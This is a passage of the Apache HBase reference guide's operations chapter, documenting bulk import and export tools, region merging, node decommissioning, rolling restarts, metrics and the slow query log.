TableInputFormatBase#getSplits)\n\n|Timeout\n|operation timeout. configured by hbase.client.operation.timeout\n|scan timeout. configured by hbase.client.scanner.timeout.period\n\n|Permission requirement\n|READ, EXECUTE\n|READ\n\n|Fault tolerance\n|no\n|depend on MapReduce\n|===\n\n\nNOTE: To see usage instructions, run the command with no options. Available options include\nspecifying column families and applying filters during the export.\n\nBy default, the `Export` tool only exports the newest version of a given cell, regardless of the number of versions stored. 
To export more than one version, replace *_<versions>_* with the desired number of versions.\n\nNote: caching for the input Scan is configured via `hbase.client.scanner.caching` in the job configuration.\n\n[[import]]\n=== Import\n\nImport is a utility that will load data that has been exported back into HBase.\nInvoke via:\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.Import <tablename> <inputdir>\n----\n\nNOTE: To see usage instructions, run the command with no options.\n\nTo import 0.94 exported files in a 0.96 cluster or onwards, you need to set system property \"hbase.import.version\" when running the import command as below:\n\n----\n$ bin\/hbase -Dhbase.import.version=0.94 org.apache.hadoop.hbase.mapreduce.Import <tablename> <inputdir>\n----\n\n[[importtsv]]\n=== ImportTsv\n\nImportTsv is a utility that will load data in TSV format into HBase.\nIt has two distinct usages: loading data from TSV format in HDFS into HBase via Puts, and preparing StoreFiles to be loaded via the `completebulkload`.\n\nTo load data via Puts (i.e., non-bulk loading):\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.ImportTsv -Dimporttsv.columns=a,b,c <tablename> <hdfs-inputdir>\n----\n\nTo generate StoreFiles for bulk-loading:\n\n[source,bourne]\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.ImportTsv -Dimporttsv.columns=a,b,c -Dimporttsv.bulk.output=hdfs:\/\/storefile-outputdir <tablename> <hdfs-data-inputdir>\n----\n\nThese generated StoreFiles can be loaded into HBase via <<completebulkload,completebulkload>>.\n\n[[importtsv.options]]\n==== ImportTsv Options\n\nRunning `ImportTsv` with no arguments prints brief usage information:\n\n----\n\nUsage: importtsv -Dimporttsv.columns=a,b,c <tablename> <inputdir>\n\nImports the given input directory of TSV data into the specified table.\n\nThe column names of the TSV data must be specified using the -Dimporttsv.columns\noption. This option takes the form of comma-separated column names, where each\ncolumn name is either a simple column family, or a columnfamily:qualifier. The special\ncolumn name HBASE_ROW_KEY is used to designate that this column should be used\nas the row key for each imported record. You must specify exactly one column\nto be the row key, and you must specify a column name for every column that exists in the\ninput data.\n\nBy default importtsv will load data directly into HBase. 
To instead generate
HFiles of data to prepare for a bulk data load, pass the option:
  -Dimporttsv.bulk.output=/path/for/output
  Note: the target table will be created with default column family descriptors if it does not already exist.

Other options that may be specified with -D include:
  -Dimporttsv.skip.bad.lines=false - fail if encountering an invalid line
  '-Dimporttsv.separator=|' - eg separate on pipes instead of tabs
  -Dimporttsv.timestamp=currentTimeAsLong - use the specified timestamp for the import
  -Dimporttsv.mapper.class=my.Mapper - A user-defined Mapper to use instead of org.apache.hadoop.hbase.mapreduce.TsvImporterMapper
----

[[importtsv.example]]
==== ImportTsv Example

For example, assume that we are loading data into a table called 'datatsv' with a ColumnFamily called 'd' with two columns "c1" and "c2".

Assume that an input file exists as follows:
----

row1	c1	c2
row2	c1	c2
row3	c1	c2
row4	c1	c2
row5	c1	c2
row6	c1	c2
row7	c1	c2
row8	c1	c2
row9	c1	c2
row10	c1	c2
----

For ImportTsv to use this input file, the command line needs to look like this:

----

 HADOOP_CLASSPATH=`${HBASE_HOME}/bin/hbase classpath` ${HADOOP_HOME}/bin/hadoop jar ${HBASE_HOME}/hbase-server-VERSION.jar importtsv -Dimporttsv.columns=HBASE_ROW_KEY,d:c1,d:c2 -Dimporttsv.bulk.output=hdfs://storefileoutput datatsv hdfs://inputfile
----

\... and in this example the first column is the rowkey, which is why the HBASE_ROW_KEY is used.
The second and third columns in the file will be imported as "d:c1" and "d:c2", respectively.

[[importtsv.warning]]
==== ImportTsv Warning

If you are preparing a lot of data for bulk loading, make sure the target HBase table is pre-split appropriately.

[[importtsv.also]]
==== See Also

For more information about bulk-loading HFiles into HBase, see <<arch.bulk.load,arch.bulk.load>>

[[completebulkload]]
=== CompleteBulkLoad

The `completebulkload` utility will move generated StoreFiles into an HBase table.
This utility is often used in conjunction with output from <<importtsv,importtsv>>.

There are two ways to invoke this utility, with explicit classname and via the driver:

.Explicit Classname
----
$ bin/hbase org.apache.hadoop.hbase.tool.LoadIncrementalHFiles <hdfs://storefileoutput> <tablename>
----

.Driver
----
HADOOP_CLASSPATH=`${HBASE_HOME}/bin/hbase classpath` ${HADOOP_HOME}/bin/hadoop jar ${HBASE_HOME}/hbase-server-VERSION.jar completebulkload <hdfs://storefileoutput> <tablename>
----

[[completebulkload.warning]]
==== CompleteBulkLoad Warning

Data generated via MapReduce is often created with file permissions that are not compatible with the running HBase process.
Assuming you're running HDFS with permissions enabled, those permissions will need to be updated before you run CompleteBulkLoad.
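One common fix is to hand ownership of the generated files to the user the HBase process runs as. A sketch, assuming HBase runs as the `hbase` user and the job output is under _hdfs://storefileoutput_ (both illustrative):

----
# Illustrative: make the bulk load output owned by the HBase service user
$ sudo -u hdfs hdfs dfs -chown -R hbase:hbase hdfs://storefileoutput
----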
For more information about bulk-loading HFiles into HBase, see <<arch.bulk.load,arch.bulk.load>>.

=== WALPlayer

WALPlayer is a utility to replay WAL files into HBase.

The WAL can be replayed for a set of tables or all tables, and a timerange can be provided (in milliseconds).
The WAL is filtered to this set of tables.
The output can optionally be mapped to another set of tables.

WALPlayer can also generate HFiles for later bulk importing; in that case only a single table and no mapping can be specified.

Invoke via:

----
$ bin/hbase org.apache.hadoop.hbase.mapreduce.WALPlayer [options] <wal inputdir> <tables> [<tableMappings>]
----

For example:

----
$ bin/hbase org.apache.hadoop.hbase.mapreduce.WALPlayer /backuplogdir oldTable1,oldTable2 newTable1,newTable2
----

WALPlayer, by default, runs as a mapreduce job.
To NOT run WALPlayer as a mapreduce job on your cluster, force it to run all in the local process by adding the flag `-Dmapreduce.jobtracker.address=local` on the command line.

[[rowcounter]]
=== RowCounter and CellCounter

link:https://hbase.apache.org/apidocs/org/apache/hadoop/hbase/mapreduce/RowCounter.html[RowCounter] is a mapreduce job to count all the rows of a table.
This is a good utility to use as a sanity check to ensure that HBase can read all the blocks of a table if there are any concerns of metadata inconsistency.
It will run the mapreduce all in a single process, but it will run faster if you have a MapReduce cluster in place for it to exploit. It is also possible to limit
the time range of data to be scanned by using the `--starttime=[starttime]` and `--endtime=[endtime]` flags.

----
$ bin/hbase org.apache.hadoop.hbase.mapreduce.RowCounter <tablename> [<column1> <column2>...]
----

RowCounter only counts one version per cell.

Note: caching for the input Scan is configured via `hbase.client.scanner.caching` in the job configuration.

HBase ships another diagnostic mapreduce job called link:https://hbase.apache.org/apidocs/org/apache/hadoop/hbase/mapreduce/CellCounter.html[CellCounter].
Like RowCounter, it is a mapreduce job that scans the table, but it gathers more fine-grained statistics.
The statistics gathered by CellCounter include:

* Total number of rows in the table.
* Total number of CFs across all rows.
* Total qualifiers across all rows.
* Total occurrence of each CF.
* Total occurrence of each qualifier.
* Total number of versions of each qualifier.

The program allows you to limit the scope of the run.
Provide a row regex or prefix to limit the rows to analyze.
Specify a time range to scan the table by using the `--starttime=[starttime]` and `--endtime=[endtime]` flags.

Use `hbase.mapreduce.scan.column.family` to specify scanning a single column family.

----
$ bin/hbase org.apache.hadoop.hbase.mapreduce.CellCounter <tablename> <outputDir> [regex or prefix]
----

Note: just like RowCounter, caching for the input Scan is configured via `hbase.client.scanner.caching` in the job configuration.

=== mlockall

It is possible to optionally pin your servers in physical memory, making them less likely to be swapped out in oversubscribed environments, by having the servers call link:http://linux.die.net/man/2/mlockall[mlockall] on startup.
See link:https://issues.apache.org/jira/browse/HBASE-4391[HBASE-4391 Add ability to
      start RS as root and call mlockall] for how to build the optional library and have it run on startup.

[[compaction.tool]]
=== Offline Compaction Tool

See the usage for the
link:https://hbase.apache.org/devapidocs/org/apache/hadoop/hbase/regionserver/CompactionTool.html[CompactionTool].
Run it like:

[source, bash]
----
$ ./bin/hbase org.apache.hadoop.hbase.regionserver.CompactionTool
----
=== `hbase clean`

The `hbase clean` command cleans HBase data from ZooKeeper, HDFS, or both.
It is appropriate to use for testing.
Run it with no options for usage instructions.
The `hbase clean` command was introduced in HBase 0.98.

----
$ bin/hbase clean
Usage: hbase clean (--cleanZk|--cleanHdfs|--cleanAll)
Options:
        --cleanZk   cleans hbase related data from zookeeper.
        --cleanHdfs cleans hbase related data from hdfs.
        --cleanAll  cleans hbase related data from both zookeeper and hdfs.
----

=== `hbase pe`

The `hbase pe` command is a shortcut provided to run the `org.apache.hadoop.hbase.PerformanceEvaluation` tool, which is used for testing.
The `hbase pe` command was introduced in HBase 0.98.4.

The PerformanceEvaluation tool accepts many different options and commands.
For usage instructions, run the command with no options.

To run PerformanceEvaluation prior to HBase 0.98.4, issue the command `hbase org.apache.hadoop.hbase.PerformanceEvaluation`.

The PerformanceEvaluation tool has received many updates in recent HBase releases, including support for namespaces, support for tags, cell-level ACLs and visibility labels, multiget support for RPC calls, increased sampling sizes, an option to randomly sleep during testing, and ability to "warm up" the cluster before testing starts.

=== `hbase ltt`

The `hbase ltt` command is a shortcut provided to run the `org.apache.hadoop.hbase.util.LoadTestTool` utility, which is used for testing.
The `hbase ltt` command was introduced in HBase 0.98.4.

You must specify either `-write` or `-update-read` as the first option.
For general usage instructions, pass the `-h` option.

To run LoadTestTool prior to HBase 0.98.4, issue the command +hbase
          org.apache.hadoop.hbase.util.LoadTestTool+.

The LoadTestTool has received many updates in recent HBase releases, including support for namespaces, support for tags, cell-level ACLs and visibility labels, testing security-related features, ability to specify the number of regions per server, tests for multi-get RPC calls, and tests relating to replication.

[[ops.regionmgt]]
== Region Management

[[ops.regionmgt.majorcompact]]
=== Major Compaction

Major compactions can be requested via the HBase shell or link:https://hbase.apache.org/apidocs/org/apache/hadoop/hbase/client/Admin.html#majorCompact-org.apache.hadoop.hbase.TableName-[Admin.majorCompact].

Note: major compactions do NOT do region merges.
See <<compaction,compaction>> for more information about compactions.

[[ops.regionmgt.merge]]
=== Merge

Merge is a utility that can merge adjoining regions in the same table (see org.apache.hadoop.hbase.util.Merge).

[source,bourne]
----
$ bin/hbase org.apache.hadoop.hbase.util.Merge <tablename> <region1> <region2>
----

If you feel you have too many regions and want to consolidate them, Merge is the utility you need.
Merge must be run when the cluster is down.
See the link:https://web.archive.org/web/20111231002503/http://ofps.oreilly.com/titles/9781449396107/performance.html[O'Reilly HBase
          Book] for an example of usage.

You will need to pass 3 parameters to this application.
The first one is the table name.
The second one is the fully qualified name of the first region to merge, like "table_name,\x0A,1342956111995.7cef47f192318ba7ccc75b1bbf27a82b.".
The third one is the fully qualified name of the second region to merge.
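Putting the three parameters together, an invocation looks like the following sketch. Both region names here are illustrative; copy the exact names from your own `hbase:meta` table or the web UI.

----
$ bin/hbase org.apache.hadoop.hbase.util.Merge table_name \
    "table_name,\x0A,1342956111995.7cef47f192318ba7ccc75b1bbf27a82b." \
    "table_name,\x0B,1342956112000.8daf47f192318ba7ccc75b1bbf27a82c."
----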
Additionally, there is a Ruby script attached to link:https://issues.apache.org/jira/browse/HBASE-1621[HBASE-1621] for region merging.

[[node.management]]
== Node Management

[[decommission]]
=== Node Decommission

You can stop an individual RegionServer by running the following script in the HBase directory on the particular node:

----
$ ./bin/hbase-daemon.sh stop regionserver
----

The RegionServer will first close all regions and then shut itself down.
On shutdown, the RegionServer's ephemeral node in ZooKeeper will expire.
The master will notice the RegionServer gone and will treat it as a 'crashed' server; it will reassign the regions the RegionServer was carrying.

.Disable the Load Balancer before Decommissioning a node
[NOTE]
====
If the load balancer runs while a node is shutting down, then there could be contention between the Load Balancer and the Master's recovery of the just-decommissioned RegionServer.
Avoid any problems by disabling the balancer first.
See <<lb,lb>> below.
====

.Kill Node Tool
[NOTE]
====
In hbase-2.0, in the bin directory, we added a script named _considerAsDead.sh_ that can be used to kill a regionserver.
Hardware issues could be detected by specialized monitoring tools before the zookeeper timeout has expired. _considerAsDead.sh_ is a simple function to mark a RegionServer as dead.
It deletes all the znodes of the server, starting the recovery process.
Plug the script into your monitoring/fault detection tools to initiate faster failover.
Be careful how you use this disruptive tool.
Copy the script if you need to make use of it in a version of hbase previous to hbase-2.0.
====

A downside to the above stop of a RegionServer is that regions could be offline for a good period of time.
Regions are closed in order.
If there are many regions on the server, the first region to close may not be back online until all regions close and the master notices the RegionServer's znode gone.
In Apache HBase 0.90.2, we added the ability to have a node gradually shed its load and then shut itself down.
Apache HBase 0.90.2 added the _graceful_stop.sh_ script.
Here is its usage:

----
$ ./bin/graceful_stop.sh
Usage: graceful_stop.sh [--config <conf-dir>] [--restart] [--reload] [--thrift] [--rest] <hostname>
 thrift      If we should stop/start thrift before/after the hbase stop/start
 rest        If we should stop/start rest before/after the hbase stop/start
 restart     If we should restart after graceful stop
 reload      Move offloaded regions back on to the stopped server
 debug       Move offloaded regions back on to the stopped server
 hostname    Hostname of server we are to stop
----

To decommission a loaded RegionServer, run the following: +$
          ./bin/graceful_stop.sh HOSTNAME+ where `HOSTNAME` is the host carrying the RegionServer you would decommission.

.On `HOSTNAME`
[NOTE]
====
The `HOSTNAME` passed to _graceful_stop.sh_ must match the hostname that hbase is using to identify RegionServers.
Check the list of RegionServers in the master UI for how HBase is referring to servers.
It's usually hostname but can also be FQDN.
Whatever HBase is using, this is what you should pass the _graceful_stop.sh_ decommission script.
If you pass IPs, the script is not yet smart enough to make a hostname (or FQDN) of it, so it will fail when it checks if the server is currently running; the graceful unloading of regions will not run.
====
The _graceful_stop.sh_ script will move the regions off the decommissioned RegionServer one at a time to minimize region churn.
It will verify the region deployed in the new location before it moves the next region, and so on, until the decommissioned server is carrying zero regions.
At this point, _graceful_stop.sh_ tells the RegionServer to `stop`.
The master will notice the RegionServer gone, but all regions will have already been redeployed, and because the RegionServer went down cleanly, there will be no WAL logs to split.

[[lb]]
.Load Balancer
[NOTE]
====
It is assumed that the Region Load Balancer is disabled while the `graceful_stop` script runs (otherwise the balancer and the decommission script will end up fighting over region deployments). Use the shell to disable the balancer:

[source]
----
hbase(main):001:0> balance_switch false
true
0 row(s) in 0.3590 seconds
----

This turns the balancer OFF.
To reenable, do:

[source]
----
hbase(main):001:0> balance_switch true
false
0 row(s) in 0.3590 seconds
----

The `graceful_stop` will check the balancer and if enabled, will turn it off before it goes to work.
If it exits prematurely because of error, it will not have reset the balancer.
Hence, it is better to manage the balancer apart from `graceful_stop`, re-enabling it after you are done with graceful_stop.
====

[[draining.servers]]
==== Decommissioning several Regions Servers concurrently

If you have a large cluster, you may want to decommission more than one machine at a time by gracefully stopping multiple RegionServers concurrently.
To gracefully drain multiple regionservers at the same time, RegionServers can be put into a "draining" state.
This is done by marking a RegionServer as a draining node by creating an entry in ZooKeeper under the _hbase_root/draining_ znode.
This znode has format `name,port,startcode` just like the regionserver entries under _hbase_root/rs_ znode.

Without this facility, decommissioning multiple nodes may be non-optimal because regions that are being drained from one region server may be moved to other regionservers that are also draining.
Marking RegionServers to be in the draining state prevents this from happening.
See this link:http://inchoate-clatter.blogspot.com/2012/03/hbase-ops-automation.html[blog
          post] for more details.
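For example, you can create the draining entry by hand with the ZooKeeper shell. In this sketch, the znode parent `/hbase` and the server entry `rs1.example.com,16020,1454466845414` are illustrative; copy the real entry from under your `_hbase_root/rs_` znode.

----
$ bin/hbase zkcli
[zk: localhost:2181(CONNECTED) 0] ls /hbase/rs
[rs1.example.com,16020,1454466845414, rs2.example.com,16020,1454466845523]
[zk: localhost:2181(CONNECTED) 1] create /hbase/draining/rs1.example.com,16020,1454466845414 ""
----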
The regionserver will throw some errors in its logs as it recalibrates where to get its data from -- it will likely roll its WAL log too -- but in general, apart from some latency spikes, it should keep on chugging.

.Short Circuit Reads
[NOTE]
====
If you are doing short-circuit reads, you will have to move the regions off the regionserver before you stop the datanode.
With short-circuit reads, even though the files are chmod'd so the regionserver should not have access, because it already has the files open it will be able to keep reading the file blocks from the bad disk even though the datanode is down.
Move the regions back after you restart the datanode.
====

[[rolling]]
=== Rolling Restart

Some cluster configuration changes require either the entire cluster, or the RegionServers, to be restarted in order to pick up the changes.
In addition, rolling restarts are supported for upgrading to a minor or maintenance release, and to a major release if at all possible.
See the release notes for the release you want to upgrade to, to find out about limitations to the ability to perform a rolling upgrade.

There are multiple ways to restart your cluster nodes, depending on your situation.
These methods are detailed below.

==== Using the `rolling-restart.sh` Script

HBase ships with a script, _bin/rolling-restart.sh_, that allows you to perform rolling restarts on the entire cluster, the master only, or the RegionServers only.
The script is provided as a template for your own script, and is not explicitly tested.
It requires password-less SSH login to be configured and assumes that you have deployed using a tarball.
The script requires you to set some environment variables before running it.
Examine the script and modify it to suit your needs.

._rolling-restart.sh_ General Usage
====
----
$ ./bin/rolling-restart.sh --help
Usage: rolling-restart.sh [--config <hbase-confdir>] [--rs-only] [--master-only] [--graceful] [--maxthreads xx]
----
====

Rolling Restart on RegionServers Only::
  To perform a rolling restart on the RegionServers only, use the `--rs-only` option.
  This might be necessary if you need to reboot the individual RegionServer or if you make a configuration change that only affects RegionServers and not the other HBase processes.

Rolling Restart on Masters Only::
  To perform a rolling restart on the active and backup Masters, use the `--master-only` option.
  You might use this if you know that your configuration change only affects the Master and not the RegionServers, or if you need to restart the server where the active Master is running.

Graceful Restart::
  If you specify the `--graceful` option, RegionServers are restarted using the _bin/graceful_stop.sh_ script, which moves regions off a RegionServer before restarting it.
  This is safer, but can delay the restart.

Limiting the Number of Threads::
  To limit the rolling restart to using only a specific number of threads, use the `--maxthreads` option.

[[rolling.restart.manual]]
==== Manual Rolling Restart

To retain more control over the process, you may wish to manually do a rolling restart across your cluster.
This uses the _graceful_stop.sh_ script described in <<decommission,decommission>>.
In this method, you can restart each RegionServer individually and then move its old regions back into place, retaining locality.
If you also need to restart the Master, you need to do it separately, and restart the Master before restarting the RegionServers using this method.
The following is an example of such a command.
You may need to tailor it to your environment.
This script does a rolling restart of RegionServers only.
It disables the load balancer before moving the regions.

----
$ for i in `cat conf/regionservers|sort`; do ./bin/graceful_stop.sh --restart --reload --debug $i; done &> /tmp/log.txt &
----

Monitor the output of the _/tmp/log.txt_ file to follow the progress of the script.

==== Logic for Crafting Your Own Rolling Restart Script

Use the following guidelines if you want to create your own rolling restart script.

. Extract the new release, verify its configuration, and synchronize it to all nodes of your cluster using `rsync`, `scp`, or another secure synchronization mechanism.
. Use the hbck utility to ensure that the cluster is consistent.
+
----
$ ./bin/hbase hbck
----
+
Perform repairs if required.
See <<hbck,hbck>> for details.

. Restart the master first.
  You may need to modify these commands if your new HBase directory is different from the old one, such as for an upgrade.
+
----
$ ./bin/hbase-daemon.sh stop master; ./bin/hbase-daemon.sh start master
----

. Gracefully restart each RegionServer, using a script such as the following, from the Master.
+
----
$ for i in `cat conf/regionservers|sort`; do ./bin/graceful_stop.sh --restart --reload --debug $i; done &> /tmp/log.txt &
----
+
If you are running Thrift or REST servers, pass the --thrift or --rest options.
For other available options, run the `bin/graceful_stop.sh --help` command.
+
It is important to drain HBase regions slowly when restarting multiple RegionServers.
Otherwise, multiple regions go offline simultaneously and must be reassigned to other nodes, which may also go offline soon.
This can negatively affect performance.
You can inject delays into the script above, for instance, by adding a shell command such as `sleep`.
To wait for 5 minutes between each RegionServer restart, modify the above script to the following:
+
----
$ for i in `cat conf/regionservers|sort`; do ./bin/graceful_stop.sh --restart --reload --debug $i && sleep 5m; done &> /tmp/log.txt &
----

. Restart the Master again, to clear out the dead servers list and re-enable the load balancer.
. Run the `hbck` utility again, to be sure the cluster is consistent.

[[adding.new.node]]
=== Adding a New Node

Adding a new regionserver in HBase is essentially free: you simply start it like this: `$ ./bin/hbase-daemon.sh start regionserver`, and it will register itself with the master.
Ideally you also started a DataNode on the same machine so that the RS can eventually start to have local files.
If you rely on ssh to start your daemons, don't forget to add the new hostname in _conf/regionservers_ on the master.

At this point the region server isn't serving data because no regions have moved to it yet.
If the balancer is enabled, it will start moving regions to the new RS.
On a small/medium cluster this can have a very adverse effect on latency as a lot of regions will be offline at the same time.
It is thus recommended to disable the balancer the same way it's done when decommissioning a node, and to move the regions manually (or even better, using a script that moves them one by one).

The moved regions will all have 0% locality and won't have any blocks in cache, so the region server will have to use the network to serve requests.
Apart from resulting in higher latency, it may also saturate your network card's capacity.
For practical purposes, consider that a standard 1GigE NIC won't be able to read much more than _100MB/s_.
In this case, or if you are in an OLAP environment and require having locality, then it is recommended to major compact the moved regions.

[[hbase_metrics]]
== HBase Metrics

HBase emits metrics which adhere to the link:https://hadoop.apache.org/docs/stable/hadoop-project-dist/hadoop-common/Metrics.html[Hadoop Metrics] API.
Starting with HBase 0.95footnote:[The Metrics system was redone in
          HBase 0.96.
See Migration\n to the New Metrics Hotness \u2013 Metrics2 by Elliot Clark for detail], HBase is configured to emit a default set of metrics with a default sampling period of every 10 seconds.\nYou can use HBase metrics in conjunction with Ganglia.\nYou can also filter which metrics are emitted and extend the metrics framework to capture custom metrics appropriate for your environment.\n\n=== Metric Setup\n\nFor HBase 0.95 and newer, HBase ships with a default metrics configuration, or [firstterm]_sink_.\nThis includes a wide variety of individual metrics, and emits them every 10 seconds by default.\nTo configure metrics for a given region server, edit the _conf\/hadoop-metrics2-hbase.properties_ file.\nRestart the region server for the changes to take effect.\n\nTo change the sampling rate for the default sink, edit the line beginning with `*.period`.\nTo filter which metrics are emitted or to extend the metrics framework, see https:\/\/hadoop.apache.org\/docs\/current\/api\/org\/apache\/hadoop\/metrics2\/package-summary.html\n\n.HBase Metrics and Ganglia\n[NOTE]\n====\nBy default, HBase emits a large number of metrics per region server.\nGanglia may have difficulty processing all these metrics.\nConsider increasing the capacity of the Ganglia server or reducing the number of metrics emitted by HBase.\nSee link:https:\/\/hadoop.apache.org\/docs\/current\/api\/org\/apache\/hadoop\/metrics2\/package-summary.html#filtering[Metrics Filtering].\n====\n\n=== Disabling Metrics\n\nTo disable metrics for a region server, edit the _conf\/hadoop-metrics2-hbase.properties_ file and comment out any uncommented lines.\nRestart the region server for the changes to take effect.\n\n[[discovering.available.metrics]]\n=== Discovering Available Metrics\n\nRather than listing each metric which HBase emits by default, you can browse through the available metrics, either as a JSON output or via JMX.\nDifferent metrics are exposed for the Master process and each region server process.\n\n.Procedure: Access a JSON Output of Available Metrics\n. After starting HBase, access the region server's web UI, at pass:[http:\/\/REGIONSERVER_HOSTNAME:60030] by default (or port 16030 in HBase 1.0+).\n. Click the [label]#Metrics Dump# link near the top.\n The metrics for the region server are presented as a dump of the JMX bean in JSON format.\n This will dump out all metrics names and their values.\n To include metrics descriptions in the listing -- this can be useful when you are exploring what is available -- add a query string of `?description=true` so your URL becomes pass:[http:\/\/REGIONSERVER_HOSTNAME:60030\/jmx?description=true].\n Not all beans and attributes have descriptions.\n. To view metrics for the Master, connect to the Master's web UI instead (defaults to pass:[http:\/\/localhost:60010] or port 16010 in HBase 1.0+) and click its [label]#Metrics\n Dump# link.\n To include metrics descriptions in the listing -- this can be useful when you are exploring what is available -- add a query string of `?description=true` so your URL becomes pass:[http:\/\/REGIONSERVER_HOSTNAME:60010\/jmx?description=true].\n Not all beans and attributes have descriptions.\n\n\nYou can use many different tools to view JMX content by browsing MBeans.\nThis procedure uses `jvisualvm`, which is an application usually available in the JDK.\n\n.Procedure: Browse the JMX Output of Available Metrics\n. Start HBase, if it is not already running.\n. 
Run the command `jvisualvm` command on a host with a GUI display.\n You can launch it from the command line or another method appropriate for your operating system.\n. Be sure the [label]#VisualVM-MBeans# plugin is installed. Browse to *Tools -> Plugins*. Click [label]#Installed# and check whether the plugin is listed.\n If not, click [label]#Available Plugins#, select it, and click btn:[Install].\n When finished, click btn:[Close].\n. To view details for a given HBase process, double-click the process in the [label]#Local# sub-tree in the left-hand panel.\n A detailed view opens in the right-hand panel.\n Click the [label]#MBeans# tab which appears as a tab in the top of the right-hand panel.\n. To access the HBase metrics, navigate to the appropriate sub-bean:\n.* Master:\n.* RegionServer:\n\n. The name of each metric and its current value is displayed in the [label]#Attributes# tab.\n For a view which includes more details, including the description of each attribute, click the [label]#Metadata# tab.\n\n=== Units of Measure for Metrics\n\nDifferent metrics are expressed in different units, as appropriate.\nOften, the unit of measure is in the name (as in the metric `shippedKBs`). Otherwise, use the following guidelines.\nWhen in doubt, you may need to examine the source for a given metric.\n\n* Metrics that refer to a point in time are usually expressed as a timestamp.\n* Metrics that refer to an age (such as `ageOfLastShippedOp`) are usually expressed in milliseconds.\n* Metrics that refer to memory sizes are in bytes.\n* Sizes of queues (such as `sizeOfLogQueue`) are expressed as the number of items in the queue.\n Determine the size by multiplying by the block size (default is 64 MB in HDFS).\n* Metrics that refer to things like the number of a given type of operations (such as `logEditsRead`) are expressed as an integer.\n\n[[master_metrics]]\n=== Most Important Master Metrics\n\nNote: Counts are usually over the last metrics reporting interval.\n\nhbase.master.numRegionServers::\n Number of live regionservers\n\nhbase.master.numDeadRegionServers::\n Number of dead regionservers\n\nhbase.master.ritCount ::\n The number of regions in transition\n\nhbase.master.ritCountOverThreshold::\n The number of regions that have been in transition longer than a threshold time (default: 60 seconds)\n\nhbase.master.ritOldestAge::\n The age of the longest region in transition, in milliseconds\n\n[[rs_metrics]]\n=== Most Important RegionServer Metrics\n\nNote: Counts are usually over the last metrics reporting interval.\n\nhbase.regionserver.regionCount::\n The number of regions hosted by the regionserver\n\nhbase.regionserver.storeFileCount::\n The number of store files on disk currently managed by the regionserver\n\nhbase.regionserver.storeFileSize::\n Aggregate size of the store files on disk\n\nhbase.regionserver.hlogFileCount::\n The number of write ahead logs not yet archived\n\nhbase.regionserver.totalRequestCount::\n The total number of requests received\n\nhbase.regionserver.readRequestCount::\n The number of read requests received\n\nhbase.regionserver.writeRequestCount::\n The number of write requests received\n\nhbase.regionserver.numOpenConnections::\n The number of open connections at the RPC layer\n\nhbase.regionserver.numActiveHandler::\n The number of RPC handlers actively servicing requests\n\nhbase.regionserver.numCallsInGeneralQueue::\n The number of currently enqueued user requests\n\nhbase.regionserver.numCallsInReplicationQueue::\n The number of currently enqueued operations 
received from replication\n\nhbase.regionserver.numCallsInPriorityQueue::\n The number of currently enqueued priority (internal housekeeping) requests\n\nhbase.regionserver.flushQueueLength::\n Current depth of the memstore flush queue.\n If increasing, we are falling behind with clearing memstores out to HDFS.\n\nhbase.regionserver.updatesBlockedTime::\n Number of milliseconds updates have been blocked so the memstore can be flushed\n\nhbase.regionserver.compactionQueueLength::\n Current depth of the compaction request queue.\n If increasing, we are falling behind with storefile compaction.\n\nhbase.regionserver.blockCacheHitCount::\n The number of block cache hits\n\nhbase.regionserver.blockCacheMissCount::\n The number of block cache misses\n\nhbase.regionserver.blockCacheExpressHitPercent ::\n The percent of the time that requests with the cache turned on hit the cache\n\nhbase.regionserver.percentFilesLocal::\n Percent of store file data that can be read from the local DataNode, 0-100\n\nhbase.regionserver.<op>_<measure>::\n Operation latencies, where <op> is one of Append, Delete, Mutate, Get, Replay, Increment; and where <measure> is one of min, max, mean, median, 75th_percentile, 95th_percentile, 99th_percentile\n\nhbase.regionserver.slow<op>Count ::\n The number of operations we thought were slow, where <op> is one of the list above\n\nhbase.regionserver.GcTimeMillis::\n Time spent in garbage collection, in milliseconds\n\nhbase.regionserver.GcTimeMillisParNew::\n Time spent in garbage collection of the young generation, in milliseconds\n\nhbase.regionserver.GcTimeMillisConcurrentMarkSweep::\n Time spent in garbage collection of the old generation, in milliseconds\n\nhbase.regionserver.authenticationSuccesses::\n Number of client connections where authentication succeeded\n\nhbase.regionserver.authenticationFailures::\n Number of client connection authentication failures\n\nhbase.regionserver.mutationsWithoutWALCount ::\n Count of writes submitted with a flag indicating they should bypass the write ahead log\n\n[[ops.monitoring]]\n== HBase Monitoring\n\n[[ops.monitoring.overview]]\n=== Overview\n\nThe following metrics are arguably the most important to monitor for each RegionServer for \"macro monitoring\", preferably with a system like link:http:\/\/opentsdb.net\/[OpenTSDB].\nIf your cluster is having performance issues it's likely that you'll see something unusual with this group.\n\nHBase::\n * See <<rs_metrics,rs metrics>>\n\nOS::\n * IO Wait\n * User CPU\n\nJava::\n * GC\n\nFor more information on HBase metrics, see <<hbase_metrics,hbase metrics>>.\n\n[[ops.slow.query]]\n=== Slow Query Log\n\nThe HBase slow query log consists of parseable JSON structures describing the properties of those client operations (Gets, Puts, Deletes, etc.) 
that either took too long to run, or produced too much output.
The thresholds for "too long to run" and "too much output" are configurable, as described below.
The output is produced inline in the main region server logs so that it is easy to discover further details from context with other logged events.
It is also prepended with identifying tags `(responseTooSlow)`, `(responseTooLarge)`, `(operationTooSlow)`, and `(operationTooLarge)` in order to enable easy filtering with grep, in case the user desires to see only slow queries.

==== Configuration

There are two configuration knobs that can be used to adjust the thresholds for when queries are logged.

* `hbase.ipc.warn.response.time` Maximum number of milliseconds that a query can be run without being logged.
  Defaults to 10000, or 10 seconds.
  Can be set to -1 to disable logging by time.
* `hbase.ipc.warn.response.size` Maximum byte size of response that a query can return without being logged.
  Defaults to 100 megabytes.
  Can be set to -1 to disable logging by size.

==== Metrics

The slow query log exposes two metrics to JMX.

* `hadoop.regionserver_rpc_slowResponse`, a global metric reflecting the durations of all responses that triggered logging.
* `hadoop.regionserver_rpc_methodName.aboveOneSec`, a metric reflecting the durations of all responses that lasted for more than one second.

==== Output

The output is tagged with the operation, e.g. `(operationTooSlow)`, if the call was a client operation, such as a Put, Get, or Delete, for which we expose detailed fingerprint information.
If not, it is tagged `(responseTooSlow)` and still produces parseable JSON output, but with less verbose information, solely regarding its duration and size in the RPC itself. `TooLarge` is substituted for `TooSlow` if the response size triggered the logging, with `TooLarge` appearing even in the case that both size and duration triggered logging.

==== Example

[source]
----
